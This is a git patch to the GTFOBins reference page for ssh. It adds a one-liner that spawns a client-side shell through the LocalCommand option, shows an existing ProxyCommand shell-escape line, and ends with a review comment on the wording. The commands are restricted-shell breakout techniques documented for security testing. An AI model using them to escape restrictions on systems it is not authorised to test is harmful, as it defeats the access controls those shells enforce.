From cd05b58e706b06ea459201417ba6149afc5417cf Mon Sep 17 00:00:00 2001 From: James Spadaro Date: Sun, 1 May 2022 05:07:53 -0400 Subject: [PATCH] Add LocalCommand option to SSH SSH has a LocalCommand option that will run a given command on the client machine after a successful connection. It is generally disabled, but can be enabled on the command line with "-oPermitLocalCommand=yes". This is useful for bypassing restricted shells. Co-authored-by: Andrea Cardaci --- _gtfobins/ssh.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index cc689e2..6f2a1f5 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -5,6 +5,8 @@ functions: code: ssh localhost $SHELL --noprofile --norc - description: Spawn interactive shell through ProxyCommand option. code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x + - description: Spawn interactive shell on client, requires a successful connection towards `host`. + code: ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host file-upload: - description: Send local file to a SSH server. code: |
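Review bot: the added `- description:` line does not name the option it relies on, while the entry just above it says "through ProxyCommand option", and it leaves out the condition the commit message states, that local commands are generally disabled and have to be enabled with `PermitLocalCommand=yes`. Suggest wording along the lines of "Spawn interactive shell on the client through the LocalCommand option; requires PermitLocalCommand to be enabled and a successful connection to `host`", with "to" rather than "towards". It would also help to say that `host` is a placeholder for a server the user can actually authenticate to, since the ProxyCommand entry above uses `x` without needing a connection and a reader may assume the same here.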